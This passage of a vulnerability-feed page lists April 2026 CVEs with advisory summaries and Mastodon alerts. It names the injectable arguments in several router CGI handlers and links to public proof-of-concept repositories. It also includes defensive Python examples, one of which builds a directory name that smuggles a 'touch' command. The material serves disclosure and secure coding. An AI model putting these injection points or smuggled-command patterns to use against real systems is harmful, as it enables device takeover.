The `AgentService.loadAgentFromFile` method uses the `js-yaml` library to parse YAML files without disabling dangerous tags (such as `!!js/function` and `!!js/undefined`). This allows an attacker to craft a malicious YAML file that, when parsed, executes arbitrary JavaScript code. An attacker can exploit this vulnerability by uploading a malicious agent definition file via the API endpo

thehackerwire@mastodon.social at 2026-04-09T04:19:54.000Z ##

🔴 CVE-2026-39890 - Critical (9.8)

PraisonAI is a multi-agent teams system. Prior to 4.5.115, the AgentService.loadAgentFromFile method uses the js-yaml library to parse YAML files without disabling dangerous tags (such as !!js/function and !!js/undefined). This allows an attacker ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39889
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-09T14:29:17

2 posts

The A2U (Agent-to-User) event stream server in PraisonAI exposes all agent activity without authentication. This is a separate component from the gateway server fixed in CVE-2026-34952. The create_a2u_routes() function registers the following endpoints with NO authentication checks:

- GET /a2u/info — exposes server info and stream names
- POST /a2u/subscribe — creates event stream subscri

thehackerwire@mastodon.social at 2026-04-09T04:35:43.000Z ##

🟠 CVE-2026-39889 - High (7.5)

PraisonAI is a multi-agent teams system. Prior to 4.5.115, the A2U (Agent-to-User) event stream server in PraisonAI exposes all agent activity without authentication. The create_a2u_routes() function registers the following endpoints with NO authe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-09T04:19:49.000Z ##

🟠 CVE-2026-39889 - High (7.5)

PraisonAI is a multi-agent teams system. Prior to 4.5.115, the A2U (Agent-to-User) event stream server in PraisonAI exposes all agent activity without authentication. The create_a2u_routes() function registers the following endpoints with NO authe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39429
(8.2 HIGH)

EPSS: 0.07%

updated 2026-04-09T14:28:53

1 post

### Summary

The cache server is directly exposed by the root shard and has no authentication or authorization in place. This allows anyone who can access the root shard to read and write to the cache server.

### Details

The cache server is routed in the pre-mux chain in the shard code. The preHandlerChainMux is handled before any authn/authz in the cache server: https://github.com/kcp-dev/kcp

thehackerwire@mastodon.social at 2026-04-09T05:00:42.000Z ##

🟠 CVE-2026-39429 - High (8.2)

kcp is a Kubernetes-like control plane for form-factors and use-cases beyond Kubernetes and container workloads. Prior to 0.30.3 and 0.29.3, the cache server is directly exposed by the root shard and has no authentication or authorization in place...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2024-1490
(7.2 HIGH)

EPSS: 0.08%

updated 2026-04-09T12:31:22

1 post

An authenticated remote attacker with high privileges can exploit the OpenVPN configuration via the web-based management interface of a WAGO PLC. If user-defined scripts are permitted, OpenVPN may allow the execution of arbitrary shell commands enabling the attacker to run arbitrary commands on the device.

certvde@infosec.exchange at 2026-04-09T10:58:20.000Z ##

#OT #Advisory VDE-2024-008
Wago: Vulnerability in WBM through Open VPN

A security vulnerability has been identified in the Web-Based Management (WBM) function when OpenVPN is enabled.
#CVE CVE-2024-1490

certvde.com/en/advisories/vde-
#oCSAF
#CSAF wago.csaf-tp.certvde.com/.well

##

CVE-2026-5852
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T09:31:56

1 post

A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Affected is the function setIptvCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument igmpVer causes os command injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks.

thehackerwire@mastodon.social at 2026-04-09T07:39:10.000Z ##

🔴 CVE-2026-5852 - Critical (9.8)

A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Affected is the function setIptvCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument igmpVer causes os command injection. The ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5854
(9.8 CRITICAL)

EPSS: 0.23%

updated 2026-04-09T09:31:56

1 post

A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this issue is the function setWiFiEasyCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument merge results in os command injection. It is possible to initiate the attack remotely. The exploit is now public and may be used.

thehackerwire@mastodon.social at 2026-04-09T07:39:00.000Z ##

🔴 CVE-2026-5854 - Critical (9.8)

A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this issue is the function setWiFiEasyCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument merge results in ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5853
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T07:16:05.273000

1 post

A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this vulnerability is the function setIpv6LanCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument addrPrefixLen leads to os command injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.

thehackerwire@mastodon.social at 2026-04-09T07:38:51.000Z ##

🔴 CVE-2026-5853 - Critical (9.8)

A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this vulnerability is the function setIpv6LanCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument addr...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5850
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T06:30:36

2 posts

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setVpnPassCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument pptpPassThru leads to os command injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.

offseq@infosec.exchange at 2026-04-09T09:00:51.000Z ##

🛑 CRITICAL: CVE-2026-5850 in Totolink A7100RU (fw 7.4cu.2313_b20191024) enables unauthenticated OS command injection via pptpPassThru. No patch yet — restrict access & monitor advisories. radar.offseq.com/threat/cve-20 #OffSeq #CVE20265850 #RouterSecurity #Infosec

##

thehackerwire@mastodon.social at 2026-04-09T06:37:44.000Z ##

🔴 CVE-2026-5850 - Critical (9.8)

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setVpnPassCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument pptpPassThru leads to os command injec...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5851
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T06:30:35

2 posts

A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This impacts the function setUPnPCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable results in os command injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.

offseq@infosec.exchange at 2026-04-09T07:30:28.000Z ##

🔒 CVE-2026-5851: CRITICAL OS command injection in Totolink A7100RU (7.4cu.2313_b20191024). Remote, unauthenticated RCE possible via /cgi-bin/cstecgi.cgi. Exploit public, no patch. Isolate device and check for updates! radar.offseq.com/threat/cve-20 #OffSeq #CVE20265851 #IoTSec

##

thehackerwire@mastodon.social at 2026-04-09T06:37:54.000Z ##

🔴 CVE-2026-5851 - Critical (9.8)

A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This impacts the function setUPnPCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable results in os command injecti...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1830
(9.8 CRITICAL)

EPSS: 0.18%

updated 2026-04-09T06:30:35

2 posts

The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.1. This is due to insufficient authorization checks on REST API endpoints that expose a sync code and allow arbitrary file uploads. This makes it possible for unauthenticated attackers to retrieve the sync code, upload PHP files with path traversal, and achieve remote code exe

thehackerwire@mastodon.social at 2026-04-09T05:17:09.000Z ##

🔴 CVE-2026-1830 - Critical (9.8)

The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.1. This is due to insufficient authorization checks on REST API endpoints that expose a sync code and allow arbitrary file u...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-04-09T04:30:27.000Z ##

🚨 CVE-2026-1830: CRITICAL RCE in davidfcarr Quick Playground (WordPress ≤1.3.1). Unauthenticated users can upload PHP files via REST API flaw — patch or disable plugin now! radar.offseq.com/threat/cve-20 #OffSeq #WordPress #Infosec #CVE20261830

##

CVE-2026-5844
(7.2 HIGH)

EPSS: 0.19%

updated 2026-04-09T05:16:06.653000

1 post

A vulnerability was found in D-Link DIR-882 1.01B02. Impacted is the function sprintf of the file prog.cgi of the component HNAP1 SetNetworkSettings Handler. The manipulation of the argument IPAddress results in os command injection. The attack may be performed from remote. The exploit has been made public and could be used. This vulnerability only affects products that are no longer supported by

offseq@infosec.exchange at 2026-04-09T06:00:27.000Z ##

🔒 CVE-2026-5844: HIGH-severity OS command injection in D-Link DIR-882 (v1.01B02). Remote attackers can execute arbitrary OS commands. No official fix — upgrade or restrict remote access. Details: radar.offseq.com/threat/cve-20 #OffSeq #DLink #Vuln #RouterSecurity

##

CVE-2026-4326
(8.8 HIGH)

EPSS: 0.08%

updated 2026-04-09T03:31:24

1 post

The Vertex Addons for Elementor plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 1.6.4. This is due to improper authorization enforcement in the activate_required_plugins() function. Specifically, the current_user_can('install_plugins') capability check does not terminate execution when it fails — it only sets an error message variable while allowing

thehackerwire@mastodon.social at 2026-04-09T03:00:29.000Z ##

🟠 CVE-2026-4326 - High (8.8)

The Vertex Addons for Elementor plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 1.6.4. This is due to improper authorization enforcement in the activate_required_plugins() function. Specifically, the...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5830
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-09T03:31:24

1 post

A vulnerability was identified in Tenda AC15 15.03.05.18. This affects the function websGetVar of the file /goform/SysToolChangePwd. Such manipulation of the argument oldPwd/newPwd/cfmPwd leads to stack-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-04-09T03:00:16.000Z ##

🟠 CVE-2026-5830 - High (8.8)

A vulnerability was identified in Tenda AC15 15.03.05.18. This affects the function websGetVar of the file /goform/SysToolChangePwd. Such manipulation of the argument oldPwd/newPwd/cfmPwd leads to stack-based buffer overflow. The attack can be exe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5173
(8.5 HIGH)

EPSS: 0.02%

updated 2026-04-09T00:32:08

2 posts

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.9.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to invoke unintended server-side methods through websocket connections due to improper access control.

1 repo

https://github.com/0xBlackash/CVE-2026-5173

oversecurity@mastodon.social at 2026-04-10T06:50:26.000Z ##

GitLab Security Update Fixes High-Severity CVE-2026-5173, 11 Other Flaws

GitLab has rolled out a major security update to address a series of vulnerabilities impacting both its Community Edition (CE) and Enterprise

🔗️ [Thecyberexpress] link.is.it/Nf3eTg

##

thehackerwire@mastodon.social at 2026-04-09T03:04:08.000Z ##

🟠 CVE-2026-5173 - High (8.5)

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.9.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to invoke unintended server-side methods through websocket ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5815
(8.8 HIGH)

EPSS: 0.08%

updated 2026-04-09T00:32:08

1 post

A vulnerability was detected in D-Link DIR-645 1.01/1.02/1.03. Impacted is the function hedwigcgi_main of the file /cgi-bin/hedwig.cgi. The manipulation results in stack-based buffer overflow. The attack can be launched remotely. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.

thehackerwire@mastodon.social at 2026-04-09T03:00:41.000Z ##

🟠 CVE-2026-5815 - High (8.8)

A vulnerability was detected in D-Link DIR-645 1.01/1.02/1.03. Impacted is the function hedwigcgi_main of the file /cgi-bin/hedwig.cgi. The manipulation results in stack-based buffer overflow. The attack can be launched remotely. The exploit is no...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3199
(CVSS UNKNOWN)

EPSS: 0.07%

updated 2026-04-09T00:32:08

1 post

A vulnerability in the task management component of Sonatype Nexus Repository versions 3.22.1 through 3.90.2 allows an authenticated attacker with task creation permissions to execute arbitrary code, bypassing the nexus.scripts.allowCreation security control.

offseq@infosec.exchange at 2026-04-09T00:00:41.000Z ##

⚠️ CRITICAL: CVE-2026-3199 in Sonatype Nexus Repository (3.22.1-3.90.2) enables arbitrary code execution via task deserialization by authenticated users. Restrict permissions & monitor activity. Patch pending. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #Nexus #Infosec

##

CVE-2026-40031
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-09T00:32:07

2 posts

MemProcFS before 5.17 contains multiple unsafe library-loading patterns that enable DLL and shared-library hijacking across six attack surfaces, including bare-name LoadLibraryU and dlopen calls without path qualification for vmmpyc, libMSCompression, and plugin DLLs. An attacker who places a malicious DLL or shared library in the working directory or manipulates LD_LIBRARY_PATH can achieve arbitr

thehackerwire@mastodon.social at 2026-04-09T04:35:35.000Z ##

🟠 CVE-2026-40031 - High (7.8)

MemProcFS before 5.17 contains multiple unsafe library-loading patterns that enable DLL and shared-library hijacking across six attack surfaces, including bare-name LoadLibraryU and dlopen calls without path qualification for vmmpyc, libMSCompress...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-09T04:19:40.000Z ##

🟠 CVE-2026-40031 - High (7.8)

MemProcFS before 5.17 contains multiple unsafe library-loading patterns that enable DLL and shared-library hijacking across six attack surfaces, including bare-name LoadLibraryU and dlopen calls without path qualification for vmmpyc, libMSCompress...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40032
(7.8 HIGH)

EPSS: 0.02%

updated 2026-04-09T00:32:07

1 post

UAC (Unix-like Artifacts Collector) before 3.3.0-rc1 contains a command injection vulnerability in the placeholder substitution and command execution pipeline where the _run_command() function passes constructed command strings directly to eval without proper sanitization. Attackers can inject shell metacharacters or command substitutions through attacker-controlled inputs including %line% values

thehackerwire@mastodon.social at 2026-04-09T04:19:44.000Z ##

🟠 CVE-2026-40032 - High (7.8)

UAC (Unix-like Artifacts Collector) before 3.3.0-rc1 contains a command injection vulnerability in the placeholder substitution and command execution pipeline where the _run_command() function passes constructed command strings directly to eval wi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40029
(7.8 HIGH)

EPSS: 0.02%

updated 2026-04-09T00:32:07

1 post

parseusbs before 1.9 contains an OS command injection vulnerability in parseUSBs.py where LNK file paths are passed unsanitized into an os.popen() shell command, allowing arbitrary command execution via crafted .lnk filenames containing shell metacharacters. An attacker can craft a .lnk filename with embedded shell metacharacters that execute arbitrary commands on the forensic examiner's machine d

thehackerwire@mastodon.social at 2026-04-09T04:00:31.000Z ##

🟠 CVE-2026-40029 - High (7.8)

parseusbs before 1.9 contains an OS command injection vulnerability in parseUSBs.py where LNK file paths are passed unsanitized into an os.popen() shell command, allowing arbitrary command execution via crafted .lnk filenames containing shell meta...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40035
(9.1 CRITICAL)

EPSS: 0.10%

updated 2026-04-09T00:32:07

2 posts

Unfurl through 2025.08 contains an improper input validation vulnerability in config parsing that enables Flask debug mode by default. The debug configuration value is read as a string and passed directly to app.run(), causing any non-empty string to evaluate truthy, allowing attackers to access the Werkzeug debugger and disclose sensitive information or achieve remote code execution.
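The mechanism described above is a type-confusion in configuration handling, not a Flask bug: `app.run(debug=...)` only tests truthiness, so the string "False" read from a config file enables the Werkzeug debugger. The following is an added example, not Unfurl's code; the INI section name, key name and helper names are assumptions. It contrasts the raw-string pattern with strict boolean parsing.

```python
"""Why a string-typed 'debug' setting silently enables Flask debug mode.

Added example; not code from the Unfurl project. The config section, key
and function names below are assumptions chosen for illustration.
"""
import configparser

# Constructed sample config: the operator believes debug mode is OFF.
SAMPLE_INI = """
[UNFURL_APP]
debug = False
"""


def load_debug_naive(ini_text: str) -> str:
    """Mirror of the bug: return the raw string from the config file."""
    cfg = configparser.ConfigParser()
    cfg.read_string(ini_text)
    return cfg["UNFURL_APP"]["debug"]


def debug_flag_as_seen_by_app_run(value) -> bool:
    """What app.run(debug=value) effectively does: a truthiness test.

    Any non-empty string, including "False", "0" or "off", is truthy.
    """
    return bool(value)


def parse_bool(value) -> bool:
    """Strict boolean parsing: only a closed set of spellings is accepted.

    Use this for values that arrive as plain strings (YAML, JSON, env vars);
    anything outside the set is an error, never silently True.
    """
    if isinstance(value, bool):
        return value
    normalized = str(value).strip().lower()
    if normalized in {"1", "true", "yes", "on"}:
        return True
    if normalized in {"0", "false", "no", "off", ""}:
        return False
    raise ValueError(f"not a boolean: {value!r}")


def load_debug_strict(ini_text: str) -> bool:
    """Hardened loader: configparser's own getboolean() does the strict parse."""
    cfg = configparser.ConfigParser()
    cfg.read_string(ini_text)
    return cfg["UNFURL_APP"].getboolean("debug", fallback=False)


if __name__ == "__main__":
    raw = load_debug_naive(SAMPLE_INI)
    print("raw config value:", repr(raw))
    print("naive  -> debug enabled?", debug_flag_as_seen_by_app_run(raw))
    print("strict -> debug enabled?", load_debug_strict(SAMPLE_INI))
```

The check a reviewer wants is the second print: with the raw string the answer is True even though the file says False. Independently of the parse, the Werkzeug debugger should never be reachable from untrusted networks; its console PIN is a speed bump, not an authentication boundary.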

thehackerwire@mastodon.social at 2026-04-09T03:48:10.000Z ##

🔴 CVE-2026-40035 - Critical (9.1)

Unfurl through 2025.08 contains an improper input validation vulnerability in config parsing that enables Flask debug mode by default. The debug configuration value is read as a string and passed directly to app.run(), causing any non-empty string...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-04-09T01:30:30.000Z ##

⚠️ CRITICAL: obsidianforensics unfurl up to 2025.08 enables Flask debug mode by default. Attackers can exploit CVE-2026-40035 for RCE & info disclosure. Avoid production use, disable debug mode, monitor for fixes. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #Flask #CVE202640035

##

CVE-2026-1092
(7.5 HIGH)

EPSS: 0.02%

updated 2026-04-09T00:32:01

1 post

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.10 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service due to improper input validation of JSON payloads.

thehackerwire@mastodon.social at 2026-04-09T03:47:52.000Z ##

🟠 CVE-2026-1092 - High (7.5)

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.10 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service due to improper input validatio...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-12664
(7.5 HIGH)

EPSS: 0.02%

updated 2026-04-08T23:16:56.200000

1 post

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL queries.

thehackerwire@mastodon.social at 2026-04-09T03:48:01.000Z ##

🟠 CVE-2025-12664 - High (7.5)

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL quer...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5859
(0 None)

EPSS: 0.03%

updated 2026-04-08T22:16:25.383000

1 post

Integer overflow in WebML in Google Chrome prior to 147.0.7727.55 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)

offseq@infosec.exchange at 2026-04-09T03:00:30.000Z ##

⚠️ CRITICAL: CVE-2026-5859 in Chrome WebML (<147.0.7727.55) allows heap corruption via integer overflow. Remote code execution possible if exploited. Patch not fully confirmed — check vendor advisory for updates: radar.offseq.com/threat/cve-20 #OffSeq #Chrome #Vuln #InfoSec

##

CVE-2026-40036
(7.5 HIGH)

EPSS: 0.10%

updated 2026-04-08T22:16:24.190000

1 post

Unfurl before 2026.04 contains an unbounded zlib decompression vulnerability in parse_compressed.py that allows remote attackers to cause denial of service. Attackers can submit highly compressed payloads via URL parameters to the /json/visjs endpoint that expand to gigabytes, exhausting server memory and crashing the service.
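The fix for an unbounded inflate is to give the decompressor an output budget rather than trusting the stream's own size. Added example, not Unfurl's code; the limit, exception and function names are assumptions. It builds a small decompression bomb as constructed input and shows the bounded inflater stopping at the budget while the plain zlib.decompress() call expands the whole thing.

```python
"""Bounded zlib inflation to defeat decompression bombs.

Added example; not Unfurl's code. The limit value and function names are
assumptions. Sample input is constructed in make_bomb().
"""
import zlib

MAX_INFLATED_BYTES = 1 * 1024 * 1024  # 1 MiB; tune to the largest legitimate input


class InflateLimitExceeded(ValueError):
    pass


def inflate_unbounded(blob: bytes) -> bytes:
    """The vulnerable pattern: output size is whatever the stream dictates."""
    return zlib.decompress(blob)


def inflate_bounded(blob: bytes, limit: int = MAX_INFLATED_BYTES) -> bytes:
    """Inflate in chunks and abort as soon as the output budget is exceeded.

    decompressobj.decompress(data, max_length) never returns more than
    max_length bytes per call; input it could not process yet is kept in
    .unconsumed_tail, and output still buffered inside zlib is obtained by
    calling decompress() again with empty input.
    """
    d = zlib.decompressobj()
    out = bytearray()
    data = blob
    while not d.eof:
        budget = limit - len(out) + 1        # +1 so an overrun is observable
        chunk = d.decompress(data, budget)
        out += chunk
        if len(out) > limit:
            raise InflateLimitExceeded(f"inflated output exceeds {limit} bytes")
        data = d.unconsumed_tail
        if not data and not chunk and not d.eof:
            raise ValueError("truncated or corrupt zlib stream")
    return bytes(out)


def make_bomb(inflated_size: int) -> bytes:
    """Constructed test input: highly compressible zeros (roughly 1000:1)."""
    return zlib.compress(b"\0" * inflated_size, 9)


if __name__ == "__main__":
    bomb = make_bomb(8 * 1024 * 1024)
    print(f"{len(bomb)} compressed bytes -> {len(inflate_unbounded(bomb))} bytes unbounded")
    try:
        inflate_bounded(bomb)
    except InflateLimitExceeded as exc:
        print("bounded inflate refused:", exc)
```

Apply the same budget to every layer that can expand input (URL-decoding of the parameter, base64, then zlib) and to the number of parameters per request, otherwise an attacker stacks several small expansions instead of one large one.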

thehackerwire@mastodon.social at 2026-04-09T04:00:21.000Z ##

🟠 CVE-2026-40036 - High (7.5)

Unfurl before 2026.04 contains an unbounded zlib decompression vulnerability in parse_compressed.py that allows remote attackers to cause denial of service. Attackers can submit highly compressed payloads via URL parameters to the /json/visjs end...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40030
(7.8 HIGH)

EPSS: 0.02%

updated 2026-04-08T22:16:23.483000

1 post

parseusbs before 1.9 contains an OS command injection vulnerability where the volume listing path argument (-v flag) is passed unsanitized into an os.popen() shell command with ls, allowing arbitrary command injection via crafted volume path arguments containing shell metacharacters. An attacker can provide a crafted volume path via the -v flag that injects arbitrary commands during volume content
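CVE-2026-40029, CVE-2026-40030 and the UAC issue (CVE-2026-40032) share one root cause: a command is assembled as a string and handed to a shell (os.popen() in parseusbs, eval in UAC), so filenames and paths become shell syntax. The following added example, not code from either project, shows the vulnerable string construction next to the two fixes: shlex.quote() when a shell string is unavoidable, and an argv list with no shell at all. The directory name with metacharacters is constructed for the demo; a POSIX host with ls is assumed.

```python
"""Shell-string construction versus argument vectors.

Added example, not code from parseusbs or UAC. Helper names and the
constructed sample directory are assumptions; assumes a POSIX host with ls.
"""
import os
import shlex
import subprocess
import tempfile


def build_ls_command_naive(volume_path: str) -> str:
    """The vulnerable pattern: the path is spliced into a shell string.

    os.popen(cmd) passes this string to /bin/sh -c, so ';', '$(...)', '|'
    and friends inside volume_path are interpreted as shell syntax.
    """
    return "ls -la " + volume_path


def build_ls_command_quoted(volume_path: str) -> str:
    """If a shell string is unavoidable, quote every untrusted token."""
    return "ls -la " + shlex.quote(volume_path)


def list_volume_safe(volume_path: str) -> list:
    """Preferred fix: no shell at all; argv reaches execve() unchanged."""
    result = subprocess.run(
        ["ls", "-1", "--", volume_path],   # "--" stops ls reading a "-x" path as flags
        capture_output=True, text=True, check=True,
    )
    return sorted(line for line in result.stdout.splitlines() if line)


def demo() -> dict:
    """Constructed scenario: a volume path whose name carries a command."""
    workdir = tempfile.mkdtemp()
    evil = os.path.join(workdir, "vol; touch pwned")   # legal directory name on POSIX
    os.mkdir(evil)
    open(os.path.join(evil, "Doc.lnk"), "w").close()

    naive = build_ls_command_naive(evil)               # built, deliberately never executed
    quoted = build_ls_command_quoted(evil)
    return {
        "path": evil,
        "naive_cmd": naive,
        "quoted_argv": shlex.split(quoted),            # what a shell would see
        "entries": list_volume_safe(evil),
        "marker_created": os.path.exists(os.path.join(workdir, "pwned")),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

In a forensic tool the untrusted input is the evidence itself (a .lnk name, a mount path, a line read from a collected file), so the correct threat model treats every string taken from the image as attacker-controlled even though the examiner types the command.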

thehackerwire@mastodon.social at 2026-04-09T04:00:44.000Z ##

🟠 CVE-2026-40030 - High (7.8)

parseusbs before 1.9 contains an OS command injection vulnerability where the volume listing path argument (-v flag) is passed unsanitized into an os.popen() shell command with ls, allowing arbitrary command injection via crafted volume path argum...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1340
(9.8 CRITICAL)

EPSS: 67.82%

updated 2026-04-08T21:34:17

3 posts

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

2 repos

https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE

https://github.com/YunfeiGE18/CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

technadu@infosec.exchange at 2026-04-09T17:05:09.000Z ##

CISA adds CVE-2026-1340 (Ivanti EPMM) to KEV ⚠️

Active exploitation confirmed
Known vulns = real attack surface
Are KEVs in your patch priority?

Source: cisa.gov/news-events/alerts/20

💬 Engage
🔔 Follow TechNadu

#InfoSec #KEV #CISA #VulnMgmt

##

AAKL@infosec.exchange at 2026-04-09T16:59:23.000Z ##

CISA has added two industrial advisories today: cisa.gov/

An Ivanti vulnerability was added yesterday:

CVE-2026-1340: Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability cve.org/CVERecord?id=CVE-2026- #infosec #CISA #Ivanti #vulnerability

##

secdb@infosec.exchange at 2026-04-08T20:00:14.000Z ##

🚨 [CISA-2026:0408] CISA Adds One Known Exploited Vulnerability to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-1340 (secdb.nttzen.cloud/cve/detail/)
- Name: Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Ivanti
- Product: Endpoint Manager Mobile (EPMM)
- Notes: Please adhere to Ivanti's guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible Ivanti products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as possible. For more information please see: hub.ivanti.com/s/article/Secur ; support.mobileiron.com/mi/vsp/ ; support.mobileiron.com/mi/vsp/ ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260408 #cisa20260408 #cve_2026_1340 #cve20261340

##

CVE-2026-2942
(9.8 CRITICAL)

EPSS: 0.13%

updated 2026-04-08T21:33:41

1 post

The ProSolution WP Client plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'proSol_fileUploadProcess' function in all versions up to, and including, 1.9.9. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

thehackerwire@mastodon.social at 2026-04-09T06:11:12.000Z ##

